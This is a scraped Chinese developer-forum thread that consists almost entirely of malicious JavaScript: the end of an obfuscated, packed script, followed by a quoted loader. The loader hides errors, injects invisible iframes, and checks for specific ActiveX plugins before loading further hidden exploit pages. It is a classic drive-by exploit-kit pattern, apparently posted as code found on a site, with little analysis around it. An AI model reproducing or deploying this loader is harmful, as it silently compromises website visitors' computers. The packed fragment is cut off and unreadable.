M0rWKEwxS5|3ihSIn9|GAvA|EdhvdGJMxb|80Sow4xemA4kl1Yi6lhLrwxsPXjUDTi4ERTterm3Rkz7vpM5e5jMdDkM|rM|KNtqknc2I6EXNH4Mu34DJslVJogIW5DuaBi8YcvdrN|xZ5XlcmZXIDlN9MbsFtZOTDs|5kE2z|MXPslwYHVA44LYBwDGyOkD6fQDPbRVXmlldhmircE|ZZ45re08T|||||||||||CVwaWgQBdIHSGs3|2Ycs0YbwyDqzpQ9vkywLXs21UxgD2Z8O4IJsIYs3UbAOsXPOYQS|5UNIpgc6|8gNCWzHpoyQPn1dTJbWpTV88jMX1fpa3M6I2JAJZ8DyJaW6BGkCQs0EIbsWYrQ7550rGRUTMyi1FlJDC41NTRNzD1z4z|Aalig38LJIW5J|gbxnNCnyvnMm|mcABLKfSV98zLI|amDvs7wVEeGhgUk|WkqYgo1XkVPUy|switch|MeAG8Fwf4ZPFHVWRhVJGnn4NEjg69YWvzdp1yQ0GhyFLXdlVrl6iUCWSuKRlba9rFzM0jDM5ZLQCVyN7IlkbuFnPixmfv6jDQgVlgmZcM0PpMxeQEdE8POwDSSjB5dNKUUcW9YwCRn8nVBb343gcRgpIYSOH2fSGGY1tDb7uY6aH16D6zkD0NpM|8KJksdB3CyYdZjgJheCDSQ|3bUzp3wjLsKLZ5mtQEeBFVkEyn7oOTXoI|4d7QhJU6u0oaY|ImFL16YgeBHoMnHA1qa4gKoFdO78cCSRa7ZkoUY|2LyBROsFUKS5NVsohRlMIQhfYrJE6swf|jXLp|IrxJ825RqLGzoRf6i872jvY71Sh2o|g9un4LtJUamArglmOmbkItPUeNj50|vGocnQJQWokuucv2pWTUJjS1j8ZWK8BYJ6k|4QsiPe|5asMM3tpUbv9VwtKsfebDRe|zgF0EpafN1dj7OIX5a14ilQDJa3QtYmCRnfleNmMbqIP0Z6e0IzhZXnm3HfOhjdTFWgAAfi6rBMO79zVxEtKM3603o82yEiOSBj55oHsKUcszWdaLBGey5QkOr4ULY8sJ7ESDT9hqRX6Y45fYk2kigte8yfThLM2UE5RSSlbtpTZp|wszSvcc|QBTUjICK1fafiSL1C5hU0hs9mnIhzJRFo9bVndgF3FJmRz5aesZTXsnre|tvkvlxxnJFGjFZI9amZBg3Mp9WI7G98RL34GHIbGApM4aohxYncDNLb4yrNaWBvmIxWCsGg0xx66Eq9hpi6McK|l4W2jF990Y7SIPxz|ujdymnRm2is|HEAom|OC8MRh9cWC4|hXquIhqneeg3I4zCNbUquCXmNh4i8MYB2HXOzO0ElOVv4wI1On572HGpost2v4MpVIG|aYY02DIfasK7|sdHNJNti6Ec8UjnA3h3'.split('|'),0,{}))
</script>
sagezk 2008-07-09
  • 打赏
  • 举报
回复
<script>
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=14.htm></iframe>");
document.write("<iframe width=20 height=0 src=re10.htm></iframe>");
document.write("<iframe width=20 height=0 src=sf.htm></iframe>");
try{var f;
var gw=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(f){};
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
try{var m;
var mw=new ActiveXObject("\x49\x45\x52\x50\x43\x74\x6C\x2E\x49\x45\x52\x50\x43\x74\x6C\x2E\x31");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=re11.htm></iframe>");}}
</script>
<script src='http://s127.cnzz.com/stat.php?id=755932&web_id=755932' language='JavaScript' charset='gb2312'></script>
加载更多回复(32)

81,092

社区成员

发帖
与我相关
我的任务
社区描述
Java Web 开发
社区管理员
  • Web 开发社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧